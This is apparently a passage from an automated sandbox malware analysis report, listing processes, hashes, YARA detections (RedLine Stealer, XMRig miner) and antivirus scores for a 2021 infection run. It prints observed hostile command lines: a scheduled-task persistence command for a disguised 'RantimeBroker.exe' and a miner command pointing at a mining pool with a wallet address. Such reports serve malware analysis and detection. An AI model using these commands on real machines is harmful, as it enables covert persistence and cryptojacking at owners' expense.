                                                                                                Commandline:'C:\Users\user\AppData\Local\pg2bsuqa.exe'
                                                                                                Imagebase:0xef0000
                                                                                                File size:4964504 bytes
                                                                                                MD5 hash:70DCA411445D3B4394D9C467BF3FF994
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.274701180.00000000008A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                • Detection: 24%, Metadefender, Browse
                                                                                                • Detection: 66%, ReversingLabs
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:40
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Local\zmql3v0y.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Users\user\AppData\Local\zmql3v0y.exe'
                                                                                                Imagebase:0xb30000
                                                                                                File size:2611424 bytes
                                                                                                MD5 hash:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000003.282484459.0000000001AC0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000006.00000003.318537012.0000000003391000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 61%, ReversingLabs
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:51
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                                                                                                Imagebase:0x1290000
                                                                                                File size:185856 bytes
                                                                                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:37:51
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:37:53
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                Imagebase:0xd80000
                                                                                                File size:2611424 bytes
                                                                                                MD5 hash:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.328721362.0000000003CD1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000003.317443395.00000000015F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 61%, ReversingLabs
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:58
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                                                                                                Imagebase:0x7ff652940000
                                                                                                File size:6889640 bytes
                                                                                                MD5 hash:E95F766A3748042EFBF0F05D823F82B7
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000003.324849643.0000020FCC35B000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, Author: Florian Roth
                                                                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, Author: Joe Security
                                                                                                Antivirus matches:
                                                                                                • Detection: 16%, Metadefender, Browse
                                                                                                • Detection: 66%, ReversingLabs
                                                                                                Reputation:low

                                                                                                General

                                                                                                Start time:17:37:59
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                Wow64 process (32bit):false
                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                Imagebase:0x7ff7ecfc0000
                                                                                                File size:625664 bytes
                                                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:high

                                                                                                General

                                                                                                Start time:17:39:05
                                                                                                Start date:23/02/2021
                                                                                                Path:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                Wow64 process (32bit):
                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                                                                                                Imagebase:
                                                                                                File size:2611424 bytes
                                                                                                MD5 hash:F0ECEFED65B00699CC2B57BF81492F56
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Reputation:low

                                                                                                Disassembly

                                                                                                Code Analysis

                                                                                                Reset < >